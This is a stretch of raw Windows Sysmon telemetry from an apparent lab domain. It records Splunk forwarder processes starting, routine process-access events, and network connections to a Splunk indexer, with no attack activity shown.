07:58:50.300{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.278{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51115-false10.0.1.12-8000- 10341000x80000000000000001051725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.759{466BC892-F63B-60EB-947D-00000000CF01}97322216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C2A5C334D1EAB20CB3ED509F558610A,SHA256=7C38ABDF287437053760FFE223B73BDFEA7B87635795455C62CF15A9254FE2F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:50.396{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57349-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001051723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.508{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.290{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4777CA860206E711B474441468C148CB,SHA256=72FB7D68192E8586F06B6D0C4D25DEB33C35E311D120517CE55B04E1793551A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.290{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3865EF0DD6CAA30B8C1856C252399156,SHA256=B65A7769734CA0F9C8BBF782D9D8E90905E093B21E6E15AF4FF739FD0046819E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.840{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.838{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.823{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0D225AF76E9958789E75080063F2E23,SHA256=51BA9C7D5D751BB4185FDE269B9DBD7F51CCFA7D0606D9F656075CDAAFAF303F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:52.014{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 